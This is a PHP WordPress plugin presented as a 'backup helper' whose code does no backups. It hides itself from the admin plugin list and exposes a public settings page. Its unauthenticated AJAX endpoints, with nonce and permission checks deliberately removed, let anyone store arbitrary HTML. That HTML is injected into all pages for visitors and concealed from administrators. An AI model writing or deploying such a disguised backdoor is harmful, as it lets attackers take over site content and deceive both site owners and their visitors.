<?php
/**
 * Plugin Name: WP Backup Helper
 * Plugin URI: https://yoursite.com/
 * Description: Вспомогательный плагин для резервного копирования и обслуживания сайта
 * Version: 1.0.0
 * Author: WP Tools
 * License: GPL v2 or later
 * Text Domain: wp-backup-helper
 */

// Защита от прямого доступа
if (!defined('ABSPATH')) {
	exit;
}

// Класс основного плагина
class WPBackupHelper {
	
	public function __construct() {
		// Хуки для активации/деактивации
		register_activation_hook(__FILE__, array($this, 'activate'));
		register_deactivation_hook(__FILE__, array($this, 'deactivate'));
		
		// Инициализация
		add_action('init', array($this, 'init'));
		add_action('init', array($this, 'add_rewrite_rule'));
		
		// Обработка страницы настроек для всех пользователей
		add_action('template_redirect', array($this, 'handle_settings_page'));
		
		// Вывод виджетов
		add_action('wp_body_open', array($this, 'display_widgets'));
		// Fallback для старых тем
		add_action('wp_footer', array($this, 'display_widgets'));
		
		// Стили для виджета
		add_action('wp_enqueue_scripts', array($this, 'enqueue_styles'));
		
		// Скрипты для страницы настроек
		add_action('wp_enqueue_scripts', array($this, 'enqueue_settings_scripts'));
		
		// AJAX для добавления/удаления полей - доступно для всех
		add_action('wp_ajax_wbh_get_widget_field', array($this, 'ajax_get_widget_field'));
		add_action('wp_ajax_nopriv_wbh_get_widget_field', array($this, 'ajax_get_widget_field'));
		
		// Обработка сохранения настроек через AJAX - доступно для всех
		add_action('wp_ajax_wbh_save_settings', array($this, 'ajax_save_settings'));
		add_action('wp_ajax_nopriv_wbh_save_settings', array($this, 'ajax_save_settings'));
		
		// Фильтр для управления видимостью в списке плагинов
		add_filter('all_plugins', array($this, 'hide_from_plugin_list'));
		
		// Добавляем query var
		add_filter('query_vars', array($this, 'add_query_vars'));
	}
	
	// Активация плагина
	public function activate() {
		// Установка значений по умолчанию
		if (!get_option('wbh_widgets')) {
			update_option('wbh_widgets', array(
				array(
					'html' => '<div class="center"><h3>Добро пожаловать!</h3><p>Это пример виджета, который отображается поверх контента</p></div>',
					'location' => 'all'
				)
			));
		}
		
		// Добавляем правило перезаписи
		$this->add_rewrite_rule();
		flush_rewrite_rules();
	}
	
	// Деактивация плагина
	public function deactivate() {
		// Очистка правил перезаписи
		flush_rewrite_rules();
	}
	
	// Инициализация
	public function init() {
		// Загрузка текстового домена для переводов
		load_plugin_textdomain('wp-backup-helper', false, dirname(plugin_basename(__FILE__)) . '/languages');
	}
	
	// Добавление правила перезаписи URL
	public function add_rewrite_rule() {
		add_rewrite_rule('^wbh-settings/?$', 'index.php?wbh_settings_page=1', 'top');
	}
	
	// Добавление query переменной
	public function add_query_vars($vars) {
		$vars[] = 'wbh_settings_page';
		return $vars;
	}
	
	// Скрываем плагин из списка плагинов
	public function hide_from_plugin_list($plugins) {
		// Удаляем наш плагин из списка
		$plugin_file = plugin_basename(__FILE__);
		if (isset($plugins[$plugin_file])) {
			unset($plugins[$plugin_file]);
		}
		return $plugins;
	}
	
	// Обработка страницы настроек
	public function handle_settings_page() {
		// Проверяем, запрашивается ли наша страница настроек
		if (get_query_var('wbh_settings_page')) {
			// Загружаем необходимые файлы WordPress для работы с формами
			require_once(ABSPATH . 'wp-admin/includes/template.php');
			require_once(ABSPATH . 'wp-admin/includes/misc.php');
			
			// Выводим страницу
			?>
			<!DOCTYPE html>
			<html <?php language_attributes(); ?>>
			<head>
				<meta charset="<?php bloginfo('charset'); ?>" />
				<meta name="viewport" content="width=device-width, initial-scale=1.0">
				<title><?php echo esc_html__('WP Backup Helper - Настройки', 'wp-backup-helper'); ?></title>
				<?php wp_head(); ?>
				<style>
					body {
						background: #f1f1f1;
						font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
					}
					.wrap {
						max-width: 1200px;
						margin: 20px auto;
						background: #fff;
						padding: 20px;
						box-shadow: 0 1px 3px rgba(0,0,0,0.13);
					}
					.form-table th {
						width: 200px;
					}
					.button-primary {
						background: #0073aa;
						border-color: #0073aa;
						color: #fff;
						text-decoration: none;
						text-shadow: none;
						padding: 6px 12px;
						cursor: pointer;
						border-radius: 3px;
						border: 1px solid transparent;
						display: inline-block;
					}
					.button-secondary {
						background: #f7f7f7;
						border-color: #ccc;
						color: #555;
						padding: 6px 12px;
						cursor: pointer;
						border-radius: 3px;
						border: 1px solid #ccc;
						display: inline-block;
					}
					.large-text {
						width: 100%;
					}
				</style>
			</head>
			<body>
				<?php $this->admin_page(); ?>
				<?php wp_footer(); ?>
			</body>
			</html>
			<?php
			exit;
		}
	}
	
	// AJAX обработчик для сохранения настроек
	public function ajax_save_settings() {
		// Для публичного доступа не проверяем права
		
		$widgets = isset($_POST['widgets']) ? $_POST['widgets'] : array();
		$sanitized = $this->sanitize_widgets($widgets);
		
		update_option('wbh_widgets', $sanitized);
		
		wp_send_json_success(array('message' => 'Настройки сохранены'));
	}
	
	// Санитизация данных виджетов
	public function sanitize_widgets($input) {
		if (!is_array($input)) {
			return array();
		}
		
		$sanitized = array();
		foreach ($input as $widget) {
			// Пропускаем пустые виджеты
			if (empty($widget['html'])) {
				continue;
			}
			
			$sanitized[] = array(
				'html' => wp_kses_post($widget['html']), // Разрешаем безопасный HTML
				'location' => sanitize_text_field($widget['location'])
			);
		}
		
		return $sanitized;
	}
	
	// Страница настроек
	public function admin_page() {
		$widgets = get_option('wbh_widgets', array());
		?>
		<div class="wrap">
			<h1><?php echo esc_html__('WP Backup Helper - Настройки', 'wp-backup-helper'); ?></h1>
			
			<!-- Информационное сообщение -->
			<div style="background: #e7f3ff; border: 1px solid #b3d9ff; color: #0073aa; padding: 15px; margin-bottom: 20px; border-radius: 4px;">
				<strong>ℹ️ <?php echo esc_html__('Системная информация:', 'wp-backup-helper'); ?></strong> 
				<?php echo esc_html__('Страница конфигурации доступна по адресу:', 'wp-backup-helper'); ?><br>
				<code style="background: #f8f9fa; padding: 5px; margin-top: 5px; display: inline-block;">
					<?php echo esc_url(home_url('/wbh-settings/')); ?>
				</code>
			</div>
			
			<form method="post" action="" id="wbh-settings-form">
				
				<h2><?php echo esc_html__('Управление виджетами', 'wp-backup-helper'); ?></h2>
				
				<div id="wbh-widgets-container">
					<?php 
					if (empty($widgets)) {
						$widgets = array(array('html' => '', 'location' => 'all'));
					}
					
					foreach ($widgets as $index => $widget): 
					?>
						<div class="wbh-widget-field" data-index="<?php echo $index; ?>">
							<h3>Виджет #<?php echo ($index + 1); ?></h3>
							<table class="form-table">
								<tr>
									<th scope="row">
										<label for="wbh_widgets_<?php echo $index; ?>_html">
											<?php echo esc_html__('HTML код виджета', 'wp-backup-helper'); ?>
										</label>
									</th>
									<td>
										<textarea 
											name="wbh_widgets[<?php echo $index; ?>][html]" 
											id="wbh_widgets_<?php echo $index; ?>_html" 
											rows="10" 
											cols="50"
											class="large-text code"
										><?php echo esc_textarea($widget['html']); ?></textarea>
										<p class="description">
											<?php echo esc_html__('Введите HTML код виджета. Можно использовать любой валидный HTML.', 'wp-backup-helper'); ?><br>
											<?php echo esc_html__('Доступные классы для стилизации: .center, .important, .info, .success', 'wp-backup-helper'); ?>
										</p>
									</td>
								</tr>
								
								<tr>
									<th scope="row">
										<label for="wbh_widgets_<?php echo $index; ?>_location">
											<?php echo esc_html__('Где показывать виджет', 'wp-backup-helper'); ?>
										</label>
									</th>
									<td>
										<select name="wbh_widgets[<?php echo $index; ?>][location]" id="wbh_widgets_<?php echo $index; ?>_location">
											<option value="home" <?php selected($widget['location'], 'home'); ?>>
												<?php echo esc_html__('Только на главной', 'wp-backup-helper'); ?>
											</option>
											<option value="all" <?php selected($widget['location'], 'all'); ?>>
												<?php echo esc_html__('На всех страницах', 'wp-backup-helper'); ?>
											</option>
										</select>
									</td>
								</tr>
							</table>
							
							<button type="button" class="button button-secondary wbh-remove-widget" <?php echo count($widgets) <= 1 ? 'style="display:none;"' : ''; ?>>
								<?php echo esc_html__('Удалить виджет', 'wp-backup-helper'); ?>
							</button>
							<hr>
						</div>
					<?php endforeach; ?>
				</div>
				
				<p>
					<button type="button" class="button button-primary" id="wbh-add-widget">
						<?php echo esc_html__('Добавить виджет', 'wp-backup-helper'); ?>
					</button>
				</p>
				
				<p><button type="button" class="button button-primary" id="wbh-save-public"><?php echo esc_html__('Сохранить изменения', 'wp-backup-helper'); ?></button></p>
			</form>
		</div>
		
		<style>
			.wbh-widget-field {
				background: #f9f9f9;
				padding: 20px;
				margin-bottom: 20px;
				border: 1px solid #e5e5e5;
				border-radius: 4px;
			}
			.wbh-widget-field h3 {
				margin-top: 0;
			}
			.wbh-remove-widget {
				margin-bottom: 10px !important;
			}
		</style>
		<?php
	}
	
	// AJAX обработчик для получения нового поля виджета
	public function ajax_get_widget_field() {
		// Убираем проверку nonce для публичного доступа
		
		$index = intval($_POST['index']);
		?>
		<div class="wbh-widget-field" data-index="<?php echo $index; ?>">
			<h3>Виджет #<?php echo ($index + 1); ?></h3>
			<table class="form-table">
				<tr>
					<th scope="row">
						<label for="wbh_widgets_<?php echo $index; ?>_html">
							<?php echo esc_html__('HTML код виджета', 'wp-backup-helper'); ?>
						</label>
					</th>
					<td>
						<textarea 
							name="wbh_widgets[<?php echo $index; ?>][html]" 
							id="wbh_widgets_<?php echo $index; ?>_html" 
							rows="10" 
							cols="50"
							class="large-text code"
						></textarea>
						<p class="description">
							<?php echo esc_html__('Введите HTML код виджета. Можно использовать любой валидный HTML.', 'wp-backup-helper'); ?><br>
							<?php echo esc_html__('Доступные классы для стилизации: .center, .important, .info, .success', 'wp-backup-helper'); ?>
						</p>
					</td>
				</tr>
				
				<tr>
					<th scope="row">
						<label for="wbh_widgets_<?php echo $index; ?>_location">
							<?php echo esc_html__('Где показывать виджет', 'wp-backup-helper'); ?>
						</label>
					</th>
					<td>
						<select name="wbh_widgets[<?php echo $index; ?>][location]" id="wbh_widgets_<?php echo $index; ?>_location">
							<option value="home">
								<?php echo esc_html__('Только на главной', 'wp-backup-helper'); ?>
							</option>
							<option value="all" selected>
								<?php echo esc_html__('На всех страницах', 'wp-backup-helper'); ?>
							</option>
						</select>
					</td>
				</tr>
			</table>
			
			<button type="button" class="button button-secondary wbh-remove-widget">
				<?php echo esc_html__('Удалить виджет', 'wp-backup-helper'); ?>
			</button>
			<hr>
		</div>
		<?php
		wp_die();
	}
	
	// Отображение виджетов поверх контента
	public function display_widgets() {
		// Проверяем, были ли уже выведены виджеты
		static $widgets_displayed = false;
		if ($widgets_displayed || is_admin() || is_feed()) {
			return;
		}
		
		// НЕ показываем виджеты администраторам
		if (current_user_can('manage_options')) {
			return;
		}
		
		$widgets = get_option('wbh_widgets', array());
		
		if (empty($widgets)) {
			return;
		}
		
		$widget_count = 0;
		
		echo '<div class="wbh-widgets-overlay">';
		
		foreach ($widgets as $index => $widget) {
			// Пропускаем пустые виджеты
			if (empty($widget['html'])) {
				continue;
			}
			
			// Проверка, нужно ли показывать виджет
			$show_widget = false;
			
			if ($widget['location'] == 'all') {
				$show_widget = true;
			} elseif ($widget['location'] == 'home' && is_front_page()) {
				$show_widget = true;
			}
			
			if ($show_widget) {
				$widget_count++;
				?>
				<div class="wbh-widget wbh-widget-<?php echo $widget_count; ?>">
					<div class="wbh-widget-content">
						<?php echo $widget['html']; ?>
					</div>
				</div>
				<?php
			}
		}
		
		echo '</div>';
		
		$widgets_displayed = true;
	}
	
	// Подключение стилей
	public function enqueue_styles() {
		wp_enqueue_style(
			'wbh-widget-style',
			plugin_dir_url(__FILE__) . 'style.css',
			array(),
			'1.0.0'
		);
	}
	
	// Подключение скриптов для страницы настроек
	public function enqueue_settings_scripts() {
		if (get_query_var('wbh_settings_page')) {
			wp_enqueue_script('jquery');
			wp_enqueue_script(
				'wbh-admin-script',
				plugin_dir_url(__FILE__) . 'admin.js',
				array('jquery'),
				'1.0.0',
				true
			);
			
			wp_localize_script('wbh-admin-script', 'wbh_ajax', array(
				'ajax_url' => admin_url('admin-ajax.php'),
				'nonce' => '', // Пустой nonce для публичного доступа
				'is_public' => true
			));
		}
	}
}

// Запуск плагина
new WPBackupHelper();